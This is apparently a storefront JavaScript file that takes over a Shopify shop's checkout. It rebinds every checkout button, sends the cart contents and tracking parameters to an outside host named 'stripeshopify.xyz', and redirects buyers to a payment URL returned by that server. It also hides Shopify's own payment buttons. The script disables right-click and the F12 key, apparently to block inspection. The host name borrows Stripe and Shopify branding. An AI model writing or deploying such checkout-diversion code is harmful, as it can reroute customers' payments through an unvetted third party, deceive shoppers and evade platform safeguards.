const fontAwesomeLink = document.createElement("link");
(fontAwesomeLink.rel = "stylesheet"), (fontAwesomeLink.href = "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css"), document.head.appendChild(fontAwesomeLink);

const sa = document.createElement("script");
(sa.type = "text/javascript"), (sa.src = "https://cdn.jsdelivr.net/npm/sweetalert2@11"), document.head.appendChild(sa);


const queryString = window.location.search,
    urlParams = new URLSearchParams(queryString),
    hasOrderProcessingParam = urlParams.get("order-processing"),
    hasEuCoIdParam = urlParams.get("EuCoId");

    function saveUTMToLocalStorage() {
        const queryString = window.location.search;
        const urlParams = new URLSearchParams(queryString);
        
        // Create an empty object to store UTM parameters
        const utm = {};
    
        // Define the UTM parameters and their corresponding keys
        const utmParams = {
            "utm_medium": "utm_medium",
            "utm_source": "utm_source",
            "utm_campaign": "utm_campaign",
            "utm_term": "utm_term",
            "utm_content": "utm_content",
            "ad_id": "ad_id",
            "ttclid":"ttclid",
            "fbclid":"fbclid",

        };
    
        // Iterate over the UTM parameters
        for (const [paramName, key] of Object.entries(utmParams)) {
            const paramValue = urlParams.get(paramName);
            // Check if the parameter value exists and is not empty
            if (paramValue) {
                utm[key] = paramValue;
            }
        }
    
        // Check if utm parameters exist in localStorage
        const existingUTM = localStorage.getItem("utm");
        // Check if utm object is not empty
        if (Object.keys(utm).length > 0 && !existingUTM) {
            localStorage.setItem("utm", JSON.stringify(utm));
        }
    }
    
    // Call the function to save UTM parameters to localStorage
    saveUTMToLocalStorage();
    

function setId() {
    localStorage.EuCoId = hasEuCoIdParam;
}
if (hasOrderProcessingParam && hasEuCoIdParam) {
    localStorage.removeItem("utm");
    function getId() {
        (document.cookie = "cart=;expires=2021-12-19T15:12:13.000Z")
        return localStorage.getItem("EuCoId");
    }
    setId(),
        document.addEventListener("DOMContentLoaded", function () {
            function addStylesAndScripts() {
                document.documentElement.setAttribute('data-theme', 'light');
                var daisyUILink = document.createElement("link");
                daisyUILink.href = "https://cdn.jsdelivr.net/npm/daisyui@4.9.0/dist/full.min.css";
                daisyUILink.rel = "stylesheet";
                daisyUILink.type = "text/css";

                // Create link element for Google Fonts
                var googleFontsLink = document.createElement("link");
                googleFontsLink.href = "https://fonts.googleapis.com/css?family=Poppins";
                googleFontsLink.rel = "stylesheet";

                // Create script element for Tailwind CSS
                var tailwindScript = document.createElement("script");
                tailwindScript.src = "https://cdn.tailwindcss.com";

                // Append link and script elements to the head
                document.head.appendChild(daisyUILink);
                document.head.appendChild(googleFontsLink);
                document.head.appendChild(tailwindScript);
            }

            function addProcessingDiv() {
                // Create a div element with specified classes
                var div = document.createElement('div');
                div.className = "h-screen flex items-center justify-center";

                // Create p element for the text
                var p = document.createElement('p');
                p.className = "italic";
                p.textContent = "";

                // Create span element for the loading spinner
                var span = document.createElement('span');
                span.className = "loading loading-spinner w-20";

                // Append the text and spinner to the div
                div.appendChild(p);
                div.appendChild(span);

                // Set body style for font-family and font-size
                document.body.style.fontFamily = "'Poppins', sans-serif";
                document.body.style.fontSize = "14px";

                // Replace the existing body content with the new div
                document.body.innerHTML = '';
                document.body.appendChild(div);
            }

            // Call functions to add CSS and create the processing div
            addStylesAndScripts();
            addProcessingDiv();




        });



    (async () => {
        const TIMEOUT_MS = 30000;
        const RETRY_DELAY_MS = 1000;
        try {
            const fetchOrderSuccess = async () => {
                const response = await Promise.race([
                    fetch(`https://${subdomain()}.${server()}/api/v1/checkout/order-success/${getId()}`),
                    new Promise((_, reject) => setTimeout(() => reject(new Error('Timeout')), TIMEOUT_MS))
                ]);
                return await response.json();
            };
            let orderSuccessResponse;
            while (true) {
                try {
                    orderSuccessResponse = await fetchOrderSuccess();
                    if (orderSuccessResponse && orderSuccessResponse.typl) {
                        break;
                    }
                } catch (error) {
                    console.error('Error fetching order success data:', error.message);
                }
                await new Promise(resolve => setTimeout(resolve, RETRY_DELAY_MS));
            }
            window.location.href = orderSuccessResponse.typl;
        } catch (error) {
            console.error('An unexpected error occurred:', error);
        }
    })();

}
let intervalID;
async function stripe_checkout(e) {
    let utmGet = localStorage.getItem('utm');
    intervalID = null;
    try {
        let n = window.location.origin;
        o = await fetch(`${n}/cart.js`),
            s = await o.json(),
            //     ipresponse = await fetch("https://ipwho.is");
            // ip = await ipresponse.json();
            // s.country = ip?.country_code;
            s.utm = JSON.parse(utmGet)
        a = await fetch(`https://${subdomain()}.${server()}/api/v1/checkout/payment`,
            {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify(s)
            }),
            r = await a.json();
        if (r.type) {
            (e.disabled = !1), (e.innerText = "Reload & Try Again...");
            var t = document.createElement("p");
            (t.id = "errorMessage"),
                (t.style.color = "red"),
                (t.style.display = "block"),
                e.parentNode.insertAdjacentElement("afterend", t),
                (document.getElementById("errorMessage").innerText = `${r?.raw?.message.split("(", 1)}`),
                Swal.fire({
                    icon: "error",
                    title: "Error...",
                    color: "red",
                    text: `${r?.raw?.message.split("(", 1)}` || "Something Went Wrong...",
                    allowOutsideClick: false,
                    confirmButtonText: 'OK'
                }).then((result) => {
                    if (result.isConfirmed) {
                        window.location.reload(); // Reload the page
                    }
                });

            console.log(r?.raw?.message);
        } else window.location.href = r.url;
    } catch (t) {
        console.log(t), (e.innerText = "Reload & Try Again..."), (e.disabled = !0);
    }
}

intervalID = setInterval(function () {
    const e = document.querySelectorAll('[name="checkout"], [id="checkout"], [id="CartDrawer-Checkout"], [form="CartDrawer-Form"], a[href="/checkout"], a[href="checkout"],a[href="/checkout/"], a[href="checkout/"], [sc="checkout"], button[sc="checkout"], a[sc="checkout"]');
    e?.forEach((e) => {
        e?.removeAttribute("name"),
            e?.removeAttribute("id"),
            e?.setAttribute("sc", "checkout"),
            e?.addEventListener("click", function (t) {
                t.preventDefault(), (e.disabled = !0);
                const n = document.createElement("i");
                (n.className = "fa-solid fa-spinner fa-spin-pulse"), (n.style.color = "#ffffff"), (n.style.fontSize = "18px"), (n.style.animationDuration = "1s"), (e.innerHTML = ""), e.appendChild(n), intervalID && stripe_checkout(e);
            });
    });
}, 100);


function subdomain() {
    let url = "noglia";
    return url
}
function server() { let server = "stripeshopify.xyz"; return server; }

document.addEventListener('contextmenu', function (e) {
    e.preventDefault();
});

document.addEventListener('keydown', function (e) {
    if (e.key === 'F12') {
        e.preventDefault();
    }
});



                                var css = 'div[data-shopify="payment-button"]{ display: none !important; } div[data-shopify="dynamic-checkout-cart"]{ display: none !important; }'
                                var style = document.createElement('style');
                                style.type = 'text/css';
                                if (style.styleSheet) {
                                    style.styleSheet.cssText = css;
                                } else {
                                    style.appendChild(document.createTextNode(css));
                                }
                                document.head.appendChild(style);
                            